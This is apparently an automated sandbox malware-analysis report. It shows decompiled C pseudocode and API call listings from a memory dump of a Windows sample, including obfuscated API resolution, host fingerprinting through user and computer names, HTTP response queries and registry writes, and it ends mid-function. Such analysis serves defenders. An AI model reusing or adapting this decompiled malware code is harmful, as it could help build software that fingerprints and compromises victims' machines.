                					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                					_v12 = _t56;
                					if(_t56 != 0) {
                						goto L15;
                					}
                					goto L3;
                					L11:
                					_t42 = E022216B2( *(_t61 + 0x1c), _t59, 0xea60);
                					_v12 = _t42;
                				} while (_t42 == 0);
                				goto L15;
                			}














                0x02223fa5
                0x02223fa5
                0x02223fb5
                0x02223fb8
                0x02223fbc
                0x02223fc2
                0x02223fc7
                0x02223fe0
                0x02223ff4
                0x02223ffb
                0x02224002
                0x02224055
                0x0222405b
                0x02224061
                0x0222409c
                0x022240a2
                0x00000000
                0x00000000
                0x00000000
                0x02224061
                0x02224008
                0x00000000
                0x0222400f
                0x0222401d
                0x02224020
                0x02224023
                0x0222402f
                0x02224033
                0x02224095
                0x02224035
                0x02224047
                0x02224085
                0x02224090
                0x02224049
                0x0222404c
                0x02224050
                0x02224050
                0x02224047
                0x00000000
                0x02224033
                0x02224008
                0x02223fcc
                0x02223fd2
                0x02223fd5
                0x02223fda
                0x00000000
                0x00000000
                0x00000000
                0x0222406a
                0x02224072
                0x02224077
                0x0222407a
                0x00000000

                APIs
                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,74CF81D0,00000000,00000000), ref: 02223FBC
                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02223F34,00000000,?), ref: 02223FCC
                • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02223FFE
                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02224023
                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02224043
                • GetLastError.KERNEL32 ref: 02224055
                  • Part of subcall function 022216B2: WaitForMultipleObjects.KERNEL32(00000002,02227C47,00000000,02227C47,?,?,?,02227C47,0000EA60), ref: 022216CD
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                • GetLastError.KERNEL32(00000000), ref: 0222408A
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                • String ID:
                • API String ID: 3369646462-0
                • Opcode ID: debd7ba65b1db748c619e6b1f709a91124f7b4e3fe99714b102989f4a0f9fc6f
                • Instruction ID: ea3cff978b3f239f2604274f4515e7f36ec8fd934fb18231ed8c0af37f9bbaa3
                • Opcode Fuzzy Hash: debd7ba65b1db748c619e6b1f709a91124f7b4e3fe99714b102989f4a0f9fc6f
                • Instruction Fuzzy Hash: 6431EDB5D10319FFDB30EFE5D884A9EB7B8AB08304F104969E542A2155D772AB88DF50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(00000000), ref: 02223ABD
                • SysAllocString.OLEAUT32(0070006F), ref: 02223AD1
                • SysAllocString.OLEAUT32(00000000), ref: 02223AE3
                • SysFreeString.OLEAUT32(00000000), ref: 02223B4B
                • SysFreeString.OLEAUT32(00000000), ref: 02223B5A
                • SysFreeString.OLEAUT32(00000000), ref: 02223B65
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: 40e808cbf920cf887ec0437d9464e458cce5c4a786dcb7177d34cb9869d4b3bb
                • Instruction ID: 2bf3fb1ea881ab9fca45998d8607508b7f924519f8e4f775fbd92509d4d39193
                • Opcode Fuzzy Hash: 40e808cbf920cf887ec0437d9464e458cce5c4a786dcb7177d34cb9869d4b3bb
                • Instruction Fuzzy Hash: 22416E36D10619BBDB01EFFCD844A9EB7BAEF49310F144466EA10EB110DB76DA09CB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02226BF9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                				intOrPtr _v8;
                				intOrPtr _t23;
                				intOrPtr _t26;
                				_Unknown_base(*)()* _t28;
                				intOrPtr _t30;
                				_Unknown_base(*)()* _t32;
                				intOrPtr _t33;
                				_Unknown_base(*)()* _t35;
                				intOrPtr _t36;
                				_Unknown_base(*)()* _t38;
                				intOrPtr _t39;
                				_Unknown_base(*)()* _t41;
                				intOrPtr _t44;
                				struct HINSTANCE__* _t48;
                				intOrPtr _t54;
                
                				_t54 = E022233DC(0x20);
                				if(_t54 == 0) {
                					_v8 = 8;
                				} else {
                					_t23 =  *0x222a348; // 0x9ad5a8
                					_t1 = _t23 + 0x222b436; // 0x4c44544e
                					_t48 = GetModuleHandleA(_t1);
                					_t26 =  *0x222a348; // 0x9ad5a8
                					_t2 = _t26 + 0x222b85c; // 0x7243775a
                					_v8 = 0x7f;
                					_t28 = GetProcAddress(_t48, _t2);
                					 *(_t54 + 0xc) = _t28;
                					if(_t28 == 0) {
                						L8:
                						E022261DA(_t54);
                					} else {
                						_t30 =  *0x222a348; // 0x9ad5a8
                						_t5 = _t30 + 0x222b849; // 0x614d775a
                						_t32 = GetProcAddress(_t48, _t5);
                						 *(_t54 + 0x10) = _t32;
                						if(_t32 == 0) {
                							goto L8;
                						} else {
                							_t33 =  *0x222a348; // 0x9ad5a8
                							_t7 = _t33 + 0x222b72b; // 0x6e55775a
                							_t35 = GetProcAddress(_t48, _t7);
                							 *(_t54 + 0x14) = _t35;
                							if(_t35 == 0) {
                								goto L8;
                							} else {
                								_t36 =  *0x222a348; // 0x9ad5a8
                								_t9 = _t36 + 0x222b883; // 0x4e6c7452
                								_t38 = GetProcAddress(_t48, _t9);
                								 *(_t54 + 0x18) = _t38;
                								if(_t38 == 0) {
                									goto L8;
                								} else {
                									_t39 =  *0x222a348; // 0x9ad5a8
                									_t11 = _t39 + 0x222b87b; // 0x6c43775a
                									_t41 = GetProcAddress(_t48, _t11);
                									 *(_t54 + 0x1c) = _t41;
                									if(_t41 == 0) {
                										goto L8;
                									} else {
                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                										_t44 = E02227A08(_t54, _a8);
                										_v8 = _t44;
                										if(_t44 != 0) {
                											goto L8;
                										} else {
                											 *_a12 = _t54;
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v8;
                			}


















                0x02226c08
                0x02226c0c
                0x02226cce
                0x02226c12
                0x02226c12
                0x02226c17
                0x02226c2a
                0x02226c2c
                0x02226c31
                0x02226c39
                0x02226c40
                0x02226c42
                0x02226c47
                0x02226cc6
                0x02226cc7
                0x02226c49
                0x02226c49
                0x02226c4e
                0x02226c56
                0x02226c58
                0x02226c5d
                0x00000000
                0x02226c5f
                0x02226c5f
                0x02226c64
                0x02226c6c
                0x02226c6e
                0x02226c73
                0x00000000
                0x02226c75
                0x02226c75
                0x02226c7a
                0x02226c82
                0x02226c84
                0x02226c89
                0x00000000
                0x02226c8b
                0x02226c8b
                0x02226c90
                0x02226c98
                0x02226c9a
                0x02226c9f
                0x00000000
                0x02226ca1
                0x02226ca7
                0x02226cac
                0x02226cb3
                0x02226cb8
                0x02226cbd
                0x00000000
                0x02226cbf
                0x02226cc2
                0x02226cc2
                0x02226cbd
                0x02226c9f
                0x02226c89
                0x02226c73
                0x02226c5d
                0x02226c47
                0x02226cdc

                APIs
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,022237FB,?,?,?,?,00000000,00000000), ref: 02226C1E
                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 02226C40
                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 02226C56
                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02226C6C
                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02226C82
                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02226C98
                  • Part of subcall function 02227A08: memset.NTDLL ref: 02227A87
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: AddressProc$AllocateHandleHeapModulememset
                • String ID:
                • API String ID: 1886625739-0
                • Opcode ID: 0915e8e43fa11d0ed031d6a3a6ff2ce834a82c91214ecb319b23584e7e3b65b8
                • Instruction ID: 2ecd8999ba2bac004dc67d4c2a8451a075e6d9a9a075e6e49d2d0010a75b9ad9
                • Opcode Fuzzy Hash: 0915e8e43fa11d0ed031d6a3a6ff2ce834a82c91214ecb319b23584e7e3b65b8
                • Instruction Fuzzy Hash: 65212DB151071ABFD720EFEADA48E6AB7ECEB043047125815E505CB321E776EA0C8B60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E02224C94(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                				signed int _v8;
                				char _v12;
                				signed int* _v16;
                				char _v284;
                				void* __esi;
                				char* _t59;
                				intOrPtr* _t60;
                				intOrPtr _t64;
                				char _t65;
                				intOrPtr _t68;
                				intOrPtr _t69;
                				intOrPtr _t71;
                				void* _t73;
                				signed int _t81;
                				void* _t91;
                				void* _t92;
                				char _t98;
                				signed int* _t100;
                				intOrPtr* _t101;
                				void* _t102;
                
                				_t92 = __ecx;
                				_v8 = _v8 & 0x00000000;
                				_t98 = _a16;
                				if(_t98 == 0) {
                					__imp__( &_v284,  *0x222a3dc);
                					_t91 = 0x80000002;
                					L6:
                					_t59 = E02226536( &_v284,  &_v284);
                					_a8 = _t59;
                					if(_t59 == 0) {
                						_v8 = 8;
                						L29:
                						_t60 = _a20;
                						if(_t60 != 0) {
                							 *_t60 =  *_t60 + 1;
                						}
                						return _v8;
                					}
                					_t101 = _a24;
                					if(E0222313F(_t92, _t97, _t101, _t91, _t59) != 0) {
                						L27:
                						E022261DA(_a8);
                						goto L29;
                					}
                					_t64 =  *0x222a318; // 0x2bd9e18
                					_t16 = _t64 + 0xc; // 0x2bd9f3a
                					_t65 = E02226536(_t64,  *_t16);
                					_a24 = _t65;
                					if(_t65 == 0) {
                						L14:
                						_t29 = _t101 + 0x14; // 0x102
                						_t33 = _t101 + 0x10; // 0x3d022290
                						if(E02227767(_t97,  *_t33, _t91, _a8,  *0x222a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                							_t68 =  *0x222a348; // 0x9ad5a8
                							if(_t98 == 0) {
                								_t35 = _t68 + 0x222bb5a; // 0x4d4c4b48
                								_t69 = _t35;
                							} else {
                								_t34 = _t68 + 0x222bbac; // 0x55434b48
                								_t69 = _t34;
                							}
                							if(E02227238(_t69,  *0x222a3d4,  *0x222a3d8,  &_a24,  &_a16) == 0) {
                								if(_t98 == 0) {
                									_t71 =  *0x222a348; // 0x9ad5a8
                									_t44 = _t71 + 0x222b332; // 0x74666f53
                									_t73 = E02226536(_t44, _t44);
                									_t99 = _t73;
                									if(_t73 == 0) {
                										_v8 = 8;
                									} else {
                										_t47 = _t101 + 0x10; // 0x3d022290
                										E02225B0E( *_t47, _t91, _a8,  *0x222a3d8, _a24);
                										_t49 = _t101 + 0x10; // 0x3d022290
                										E02225B0E( *_t49, _t91, _t99,  *0x222a3d0, _a16);
                										E022261DA(_t99);
                									}
                								} else {
                									_t40 = _t101 + 0x10; // 0x3d022290
                									E02225B0E( *_t40, _t91, _a8,  *0x222a3d8, _a24);
                									_t43 = _t101 + 0x10; // 0x3d022290
                									E02225B0E( *_t43, _t91, _a8,  *0x222a3d0, _a16);
                								}
                								if( *_t101 != 0) {
                									E022261DA(_a24);
                								} else {
                									 *_t101 = _a16;
                								}
                							}
                						}
                						goto L27;
                					}
                					_t21 = _t101 + 0x10; // 0x3d022290
                					_t81 = E022258BD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                					if(_t81 == 0) {
                						_t100 = _v16;
                						if(_v12 == 0x28) {
                							 *_t100 =  *_t100 & _t81;
                							_t26 = _t101 + 0x10; // 0x3d022290
                							E02227767(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                						}
                						E022261DA(_t100);
                						_t98 = _a16;
                					}
                					E022261DA(_a24);
                					goto L14;
                				}
                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                					goto L29;
                				} else {
                					_t97 = _a8;
                					E02227AB0(_t98, _a8,  &_v284);
                					__imp__(_t102 + _t98 - 0x117,  *0x222a3dc);
                					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                					_t91 = 0x80000003;
                					goto L6;
                				}
                			}























                0x02224c94
                0x02224c9d
                0x02224ca4
                0x02224ca9
                0x02224d16
                0x02224d1c
                0x02224d21
                0x02224d28
                0x02224d2d
                0x02224d32
                0x02224e9d
                0x02224ea4
                0x02224ea4
                0x02224ea9
                0x02224eab
                0x02224eab
                0x02224eb4
                0x02224eb4
                0x02224d38
                0x02224d44
                0x02224e93
                0x02224e96
                0x00000000
                0x02224e96
                0x02224d4a
                0x02224d4f
                0x02224d52
                0x02224d57
                0x02224d5c
                0x02224da5
                0x02224da5
                0x02224db8
                0x02224dc2
                0x02224dc8
                0x02224dcf
                0x02224dd9
                0x02224dd9
                0x02224dd1
                0x02224dd1
                0x02224dd1
                0x02224dd1
                0x02224dfb
                0x02224e03
                0x02224e31
                0x02224e36
                0x02224e3d
                0x02224e42
                0x02224e46
                0x02224e78
                0x02224e48
                0x02224e55
                0x02224e58
                0x02224e68
                0x02224e6b
                0x02224e71
                0x02224e71
                0x02224e05
                0x02224e12
                0x02224e15
                0x02224e27
                0x02224e2a
                0x02224e2a
                0x02224e82
                0x02224e8e
                0x02224e84
                0x02224e87
                0x02224e87
                0x02224e82
                0x02224dfb
                0x00000000
                0x02224dc2
                0x02224d6b
                0x02224d6e
                0x02224d75
                0x02224d7b
                0x02224d7e
                0x02224d80
                0x02224d8c
                0x02224d8f
                0x02224d8f
                0x02224d95
                0x02224d9a
                0x02224d9a
                0x02224da0
                0x00000000
                0x02224da0
                0x02224cae
                0x00000000
                0x02224cd5
                0x02224cd5
                0x02224ce1
                0x02224cf4
                0x02224cfa
                0x02224d02
                0x00000000
                0x02224d02

                APIs
                • StrChrA.SHLWAPI(02226A76,0000005F,00000000,00000000,00000104), ref: 02224CC7
                • lstrcpy.KERNEL32(?,?), ref: 02224CF4
                  • Part of subcall function 02226536: lstrlen.KERNEL32(?,00000000,02BD9E18,00000000,02226F0A,02BDA03B,43175AC3,?,?,?,?,43175AC3,00000005,0222A00C,4D283A53,?), ref: 0222653D
                  • Part of subcall function 02226536: mbstowcs.NTDLL ref: 02226566
                  • Part of subcall function 02226536: memset.NTDLL ref: 02226578
                  • Part of subcall function 02225B0E: lstrlenW.KERNEL32(?,?,?,02224E5D,3D022290,80000002,02226A76,022257D1,74666F53,4D4C4B48,022257D1,?,3D022290,80000002,02226A76,?), ref: 02225B33
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                • lstrcpy.KERNEL32(?,00000000), ref: 02224D16
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                • String ID: ($\
                • API String ID: 3924217599-1512714803
                • Opcode ID: cb7257c5c2ee6b464c7ff976bd07cc6180b8ba1221a7710c28486c18448d85b6
                • Instruction ID: 49f37cb00b3bb4aaffb558457ae94778f2abd41b6e78aa21071ebf214b24bc5c
                • Opcode Fuzzy Hash: cb7257c5c2ee6b464c7ff976bd07cc6180b8ba1221a7710c28486c18448d85b6
                • Instruction Fuzzy Hash: 6551377252022AFBDF21AFE0DD44EAA77BAEF04314F008514F91196168D777E929DB10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02221340() {
                				long _v8;
                				long _v12;
                				int _v16;
                				long _t39;
                				long _t43;
                				signed int _t47;
                				short _t51;
                				signed int _t52;
                				int _t56;
                				int _t57;
                				char* _t64;
                				short* _t67;
                
                				_v16 = 0;
                				_v8 = 0;
                				GetUserNameW(0,  &_v8);
                				_t39 = _v8;
                				if(_t39 != 0) {
                					_v12 = _t39;
                					_v8 = 0;
                					GetComputerNameW(0,  &_v8);
                					_t43 = _v8;
                					if(_t43 != 0) {
                						_t11 = _t43 + 2; // 0x7491c742
                						_v12 = _v12 + _t11;
                						_t64 = E022233DC(_v12 + _t11 << 2);
                						if(_t64 != 0) {
                							_t47 = _v12;
                							_t67 = _t64 + _t47 * 2;
                							_v8 = _t47;
                							if(GetUserNameW(_t67,  &_v8) == 0) {
                								L7:
                								E022261DA(_t64);
                							} else {
                								_t51 = 0x40;
                								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                								_t52 = _v8;
                								_v12 = _v12 - _t52;
                								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                									goto L7;
                								} else {
                									_t56 = _v12 + _v8;
                									_t31 = _t56 + 2; // 0x2223e01
                									_v12 = _t56;
                									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                									_v8 = _t57;
                									if(_t57 == 0) {
                										goto L7;
                									} else {
                										_t64[_t57] = 0;
                										_v16 = _t64;
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v16;
                			}















                0x0222134e
                0x02221351
                0x02221354
                0x0222135a
                0x0222135f
                0x02221365
                0x0222136d
                0x02221370
                0x02221376
                0x0222137b
                0x02221384
                0x02221388
                0x02221395
                0x02221399
                0x0222139b
                0x0222139f
                0x022213a2
                0x022213b2
                0x02221405
                0x02221406
                0x022213b4
                0x022213b9
                0x022213ba
                0x022213bf
                0x022213c2
                0x022213d5
                0x00000000
                0x022213d7
                0x022213da
                0x022213df
                0x022213ed
                0x022213f0
                0x022213f6
                0x022213fb
                0x00000000
                0x022213fd
                0x022213fd
                0x02221400
                0x02221400
                0x022213fb
                0x022213d5
                0x0222140b
                0x0222140c
                0x0222137b
                0x02221412

                APIs
                • GetUserNameW.ADVAPI32(00000000,02223DFF), ref: 02221354
                • GetComputerNameW.KERNEL32(00000000,02223DFF), ref: 02221370
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • GetUserNameW.ADVAPI32(00000000,02223DFF), ref: 022213AA
                • GetComputerNameW.KERNEL32(02223DFF,7491C740), ref: 022213CD
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02223DFF,00000000,02223E01,00000000,00000000,?,7491C740,02223DFF), ref: 022213F0
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                • String ID:
                • API String ID: 3850880919-0
                • Opcode ID: 731e562ee99054275b316fb3108dc7f6fab1212f959898f9266093b7df1ffd62
                • Instruction ID: 384ada8f7e5085258cf4ecce4825d279e7c6c23ba42c2b5b031916ed0501f433
                • Opcode Fuzzy Hash: 731e562ee99054275b316fb3108dc7f6fab1212f959898f9266093b7df1ffd62
                • Instruction Fuzzy Hash: A7214976D00219FFCB10DFE5D988DEEBBB8EF44204B1144AAE509E7241DB319B59CB10
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0050167F,0000000A,?,?), ref: 00501824
                • CreateFileMappingW.KERNEL32(000000FF,00404188,00000004,00000000,?,?,?,?,54D38000,00000192), ref: 00501884
                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0050167F,0000000A), ref: 005018AF
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0050167F,0000000A,?,?), ref: 005018D0
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0050167F,0000000A,?,?), ref: 005018D8
                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView
                • String ID:
                • API String ID: 2685682793-0
                • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                • Instruction ID: 64db3c3de8f29a4286d5d635259dde8e1d908afb260b01bc5e3353c911d25b46
                • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                • Instruction Fuzzy Hash: 7E2195B2A00509BFD710AFA4DC88EAE7FADFF44395F108435FA05E71D0D6709A448B69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E022254D8(intOrPtr _a4) {
                				void* _t2;
                				unsigned int _t4;
                				void* _t5;
                				long _t6;
                				void* _t7;
                				void* _t15;
                
                				_t2 = CreateEventA(0, 1, 0, 0);
                				 *0x222a30c = _t2;
                				if(_t2 == 0) {
                					return GetLastError();
                				}
                				_t4 = GetVersion();
                				if(_t4 != 5) {
                					L4:
                					if(_t15 <= 0) {
                						_t5 = 0x32;
                						return _t5;
                					}
                					L5:
                					 *0x222a2fc = _t4;
                					_t6 = GetCurrentProcessId();
                					 *0x222a2f8 = _t6;
                					 *0x222a304 = _a4;
                					_t7 = OpenProcess(0x10047a, 0, _t6);
                					 *0x222a2f4 = _t7;
                					if(_t7 == 0) {
                						 *0x222a2f4 =  *0x222a2f4 | 0xffffffff;
                					}
                					return 0;
                				}
                				if(_t4 >> 8 > 0) {
                					goto L5;
                				}
                				_t15 = _t4 - _t4;
                				goto L4;
                			}









                0x022254e0
                0x022254e6
                0x022254ed
                0x00000000
                0x02225547
                0x022254ef
                0x022254f7
                0x02225504
                0x02225504
                0x02225544
                0x00000000
                0x02225544
                0x02225506
                0x02225506
                0x0222550b
                0x0222551d
                0x02225522
                0x02225528
                0x0222552e
                0x02225535
                0x02225537
                0x02225537
                0x00000000
                0x0222553e
                0x02225500
                0x00000000
                0x00000000
                0x02225502
                0x00000000

                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02225037,?), ref: 022254E0
                • GetVersion.KERNEL32 ref: 022254EF
                • GetCurrentProcessId.KERNEL32 ref: 0222550B
                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02225528
                • GetLastError.KERNEL32 ref: 02225547
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                • String ID:
                • API String ID: 2270775618-0
                • Opcode ID: b8e1388054559f0e2707945208aaf05d2391c11c8426ae9d4c00ea0dfcd2fd54
                • Instruction ID: f496384c4344bec5d8f2f3bd34d29e8ae98addb277f5afef77faf4a754bd1eaa
                • Opcode Fuzzy Hash: b8e1388054559f0e2707945208aaf05d2391c11c8426ae9d4c00ea0dfcd2fd54
                • Instruction Fuzzy Hash: 8AF06DB0DA0312BBD7384FE0B91EB143BA6A704751F629914E516DA1C4EBB381BCCB15
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00502052
                • GetModuleHandleA.KERNEL32(00000000), ref: 00502062
                • GetCommandLineW.KERNEL32 ref: 0050206D
                  • Part of subcall function 00501C58: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00501C8D
                  • Part of subcall function 00501C58: Sleep.KERNEL32(00000000,00000030), ref: 00501CD4
                  • Part of subcall function 00501C58: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 00501CFC
                  • Part of subcall function 00501C58: GetSystemDefaultUILanguage.KERNEL32 ref: 00501D06
                  • Part of subcall function 00501C58: VerLanguageNameA.KERNEL32(?,?,00000004), ref: 00501D19
                • HeapDestroy.KERNEL32 ref: 00502080
                • ExitProcess.KERNEL32 ref: 00502087
                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID: HeapLanguageSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleNameProcessQuerySleep
                • String ID:
                • API String ID: 1393419808-0
                • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                • Instruction ID: bf055d56dd076ffde3d587b6f515220016ebadc5894100461a91dbe29ac05199
                • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                • Instruction Fuzzy Hash: 4FE0B6B0803620ABC3216F71BE0CA4E7E2CBB59B527000535F605F2165CB388A81CA9D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 46%
                			E02226CDF(intOrPtr* __eax) {
                				void* _v8;
                				WCHAR* _v12;
                				void* _v16;
                				char _v20;
                				void* _v24;
                				intOrPtr _v28;
                				void* _v32;
                				intOrPtr _v40;
                				short _v48;
                				intOrPtr _v56;
                				short _v64;
                				intOrPtr* _t54;
                				intOrPtr* _t56;
                				intOrPtr _t57;
                				intOrPtr* _t58;
                				intOrPtr* _t60;
                				void* _t61;
                				intOrPtr* _t63;
                				intOrPtr* _t65;
                				short _t67;
                				intOrPtr* _t68;
                				intOrPtr* _t70;
                				intOrPtr* _t72;
                				intOrPtr* _t75;
                				intOrPtr* _t77;
                				intOrPtr _t79;
                				intOrPtr* _t83;
                				intOrPtr* _t87;
                				intOrPtr _t103;
                				intOrPtr _t109;
                				void* _t118;
                				void* _t122;
                				void* _t123;
                				intOrPtr _t130;
                
                				_t123 = _t122 - 0x3c;
                				_push( &_v8);
                				_push(__eax);
                				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                				if(_t118 >= 0) {
                					_t54 = _v8;
                					_t103 =  *0x222a348; // 0x9ad5a8
                					_t5 = _t103 + 0x222b038; // 0x3050f485
                					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                					_t56 = _v8;
                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                					if(_t118 >= 0) {
